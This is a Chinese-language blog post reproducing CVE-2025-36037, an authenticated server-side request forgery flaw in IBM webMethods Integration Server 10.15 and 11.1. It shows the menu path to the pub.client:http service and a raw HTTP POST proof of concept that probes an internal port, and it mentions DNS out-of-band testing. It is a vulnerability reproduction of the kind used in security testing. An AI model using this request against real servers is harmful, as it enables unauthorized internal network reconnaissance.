CVE-2025-36037-IBM webMethods 集成服务器请求伪造-漏洞复现

墨言ink2026-01-13 8:33

工作的时候渗透测试了这个系统,找到了N-day但是没有公开的漏洞复现细节,在此分享一下。

IBM webMethods 集成服务器请求伪造漏洞

漏洞概述

IBM webMethods Integration 服务器受到服务器端请求伪造 (SSRF) 的影响。这可能允许经过身份验证的攻击者从系统发送未经授权的请求,潜在地导致网络枚举或促进其他攻击

漏洞地址

https://nvd.nist.gov/vuln/detail/CVE-2025-36037

影响版本

IBM webMethods Integration 10.15

IBM webMethods Integration 11.1

漏洞复现

需要先登入,进入webMethods系统

Packages-Management-WmPublic-Browse services in WmPublic

可以找到很多打包好的服务

测试发现pub.client:http包可以进行SSRF漏洞的利用。

漏洞POC

复制代码 
POST /invoke/pub.client:http HTTP/1.1
HOST:
Cookie:
Content-Type: application/x-www-form-urlencode

url=http://127.0.0.1:22&method=get

利用SSRF探测发现22端口开放。也可以进行DNS外带测试。

相关推荐
兄弟加油,别颓废了。12 小时前
BUUCTF——Basic——BUU LFI COURSE 11
安全·web安全
cramer_50h15 小时前
我的 网络安全资产暴露/攻击面管理系统
安全·web安全
Chengbei1115 小时前
Chrome浏览器渗透利器支持原生扫描!JS 端点 + 敏感目录 + 原型污染自动化检测|VulnRadar
javascript·chrome·安全·web安全·网络安全·自动化·系统安全
尤山海18 小时前
深度防御:内容类网站如何有效抵御 SQL 注入与脚本攻击(XSS)
前端·sql·安全·web安全·性能优化·状态模式·xss
一只鹿鹿鹿21 小时前
网络安全风险评估报告如何写?(Word文件)
java·大数据·spring boot·安全·web安全·小程序
Z1eaf_complete21 小时前
OpenSSL 可预测 PRNG 漏洞(CVE-2008-0166)
安全·web安全
小二·1 天前
HTTPS全链路解析:从证书申请到Nginx配置(含国密SM2实战)|网络安全
nginx·web安全·https
Ho1aAs1 天前
『OpenClaw安全』CVE-2026-25253:ClawJacked One-Click RCE
安全·web安全·网络安全·ai·智能体·agent安全·openclaw
志栋智能1 天前
安全超自动化的四大支柱:检测、分析、响应、恢复
运维·网络·人工智能·安全·web安全·自动化
谪星·阿凯2 天前
CSRF&SSRF漏洞攻击:溯源解析与实战指南
安全·web安全·php·csrf
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04Labelme从安装到标注:零基础完整指南05AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南06UV安装并设置国内源07小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)08OpenClaw Control UI安全上下文访问配置09Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services10“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)